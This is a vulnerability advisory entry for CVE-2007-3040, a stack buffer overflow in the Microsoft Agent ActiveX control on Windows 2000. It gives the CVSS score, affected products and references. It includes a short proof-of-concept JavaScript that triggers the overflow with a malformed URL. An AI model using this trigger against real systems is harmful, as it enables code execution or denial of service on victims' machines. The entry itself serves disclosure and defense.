Microsoft Agent agentdpv.dll ActiveX Control Malformed URL Stack Overflow Vulnerability

Vulnerability ID: 1113609
Vulnerability type: Buffer overflow
Published: 2007-09-11
Updated: 2009-04-21
CVE ID: CVE-2007-3040
CNNVD-ID: CNNVD-200709-120
Platform: Windows
CVSS score: 9.3
|Vulnerability sources
https://www.exploit-db.com/exploits/30567
https://www.securityfocus.com/bid/25566
https://cxsecurity.com/issue/WLB-2007090042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-120
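|Vulnerability details
Microsoft Windows is a family of operating systems released by Microsoft. The Agent ActiveX control shipped with Windows has a buffer overflow in its implementation, which a remote attacker may be able to exploit to take control of a user's system. The Microsoft Agent ActiveX control installed with Windows uses animated characters to guide users in how to use the computer. The control is registered as follows:

File: agentdpv.dll
ProgID: Agent.Control
CLASSID: D45FD31B-5C6E-11D1-9EC1-00C04FD7081F

The Microsoft Agent control has a stack overflow in the way it handles certain specially crafted URLs. If a user is tricked into visiting a malicious web page, the attacker can remotely execute commands on the affected system. Users whose accounts are configured with fewer user rights on the system are less affected than users who operate with administrative user rights.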
|Vulnerability exploit
source: http://www.securityfocus.com/bid/25566/info

Microsoft Agent (agentsvr.exe) is prone to a stack-based buffer-overflow vulnerability because the application fails to adequately bounds-check user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions. 

<script language="javascript">
function document::OnClick() {
        var agent, character, url;
        agent = new ActiveXObject("Agent.Control.2");
        agent.connected = true;
        agent.Characters.Load("Genie", "http:///");
        character = agent.Characters.Character("Genie");
        character.Show();
        character.Think ("brazil owns!");
        character.Speak('brazil owns!');
        character.Play('Processing');
}
</script>
|Affected products
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Professional SP4
|References

Source: US-CERT
Name: TA07-254A
Link: http://www.us-cert.gov/cas/techalerts/TA07-254A.html
Source: US-CERT
Name: VU#716872
Link: http://www.kb.cert.org/vuls/id/716872
Source: BUGTRAQ
Name: 20070911 Assurent VR - Microsoft Agent Crafted URL Stack Buffer Overflow
Link: http://www.securityfocus.com/archive/1/archive/1/479096/100/0/threaded
Source: MS
Name: MS07-051
Link: http://www.microsoft.com/technet/security/Bulletin/MS07-051.mspx
Source: VUPEN
Name: ADV-2007-3113
Link: http://www.frsirt.com/english/advisories/2007/3113
Source: SECUNIA
Name: 26753
Link: http://secunia.com/advisories/26753
Source: XF
Name: ms-agent-url-code-execution(35752)
Link: http://xforce.iss.net/xforce/xfdb/35752
Source: BID
Name: 25566
Link: http://www.securityfocus.com/bid/25566
Source: OSVDB
Name: 36934
Link: http://www.osvdb.org/36934
Source: SECTRACK
Name: 1018677
Link: http://securitytracker.com/id?1018677
Source: SREASON
Name: 3124
Link: http://securityreason.com/securityalert/3124
Source: IDEFENSE
Name: 20070911 Microsoft Windows 2000 Agent URL Canonicalizing Stack Based Buffer Overflow Vulnerability
Link: http://labs.idefense.com/intelligence/vulnerabil